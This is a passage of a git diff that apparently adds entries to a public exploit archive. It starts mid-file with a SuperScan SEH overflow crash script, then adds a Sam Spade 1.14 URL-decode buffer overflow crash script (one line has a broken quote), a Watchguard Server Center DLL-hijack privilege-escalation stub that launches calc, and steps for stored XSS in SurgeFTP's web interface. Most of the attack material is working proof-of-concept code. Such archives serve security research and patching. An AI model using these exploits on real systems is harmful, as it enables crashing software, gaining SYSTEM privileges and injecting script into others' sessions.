SuperSca.00473774 +#EDI 00000000 +#EIP 41414141 + +buffer = "\x41" * 328 +nseh = "\x42" * 4 +seh = "\x43" * 4 + +f = open ("super_scan_4.1_windows_enumeration.txt", "w") +f.write(buffer + nseh + seh) +f.close() diff --git a/platforms/windows/dos/38761.py b/platforms/windows/dos/38761.py new file mode 100755 index 000000000..58f5307c3 --- /dev/null +++ b/platforms/windows/dos/38761.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python +# Exploit Title : Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC +# Discovery by : Vivek Mahajan - c3p70r +# Discovery Date : 19/11/2015 +# Vendor Homepage : http://samspade.org +# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html +# Tested Version : 1.14 +# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite +# Tested On : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64 +# Crash Point : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http:// + + + +buffer = "A"*510 + +file = open("spade.txt, 'w') +file.write(buffer) +file.close() + + +# Follow on twitter @vik.create + diff --git a/platforms/windows/local/38752.c b/platforms/windows/local/38752.c new file mode 100755 index 000000000..da327146b --- /dev/null +++ b/platforms/windows/local/38752.c @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/62261/info + +Watchguard Server Center is prone to a local privilege-escalation vulnerability. + +Local attackers can exploit this issue to gain SYSTEM privileges. Successful exploits will result in the complete compromise of affected computers. + +Watchguard Server Center 11.7.4 and 11.7.3 are vulnerable; other versions may also be affected. + +#include + +#define DLL_EXPORT __declspec(dllexport) + +#ifdef __cplusplus +extern "C" +{ +#endif + +void DLL_EXPORT wgpr_library_get() +{ + WinExec("calc",0); +} + +#ifdef __cplusplus +} +#endif + diff --git a/platforms/windows/webapps/38762.txt b/platforms/windows/webapps/38762.txt new file mode 100755 index 000000000..02b783aa5 --- /dev/null +++ b/platforms/windows/webapps/38762.txt @@ -0,0 +1,33 @@ +******************************************************************************************** +# Exploit Netwin SurgeFTP Sever Stored Cross Site Scripting Vulnerabilities +# Date: 11/18/2015 +# Exploit Author: Un_N0n +# Vendor: NetWin +# Software Link: http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp +# Version: 23d6 +# Tested on: Windows 7 x64(64bit) +******************************************************************************************** +[Info] + +Surgeftp web-interface suffers with multiple Stored XSS vulnerabilities. + +They are: + +Stored XSS in 'Domain Name' field. + +[How to?] +1. Open SurgeFTP web interface, Click on global option from the menu. +2. Add a new domain, in 'Domain Name' field, add in this() payload. +3. Save, then navigate to main page, hover mouse over 'broken image' in 'domains' section. + +Stored XSS in 'Mirrors'. + +[How to?] +1. Open surgeftp web interface, Click on 'Mirrors' option from the menu. +2. Click on Add Mirror, in 'Local path' & 'Remote Host' field add in this() payload. +3. Save, then navigate to 'Mirror' page again, Hover mouse over the 'broken image' in 'local path' & 'remote host' field. + +Previously, Somebody else reported Stored XSS vulnerabilities in SurgeFTP. +Vendor tried to fix the previously reported XSS vulnerabilities by blacklisting only the payload +which is well not a good practice since i have triggered the same vulnerability by just entering different XSS payload, +therefore White-listing is the correct solution.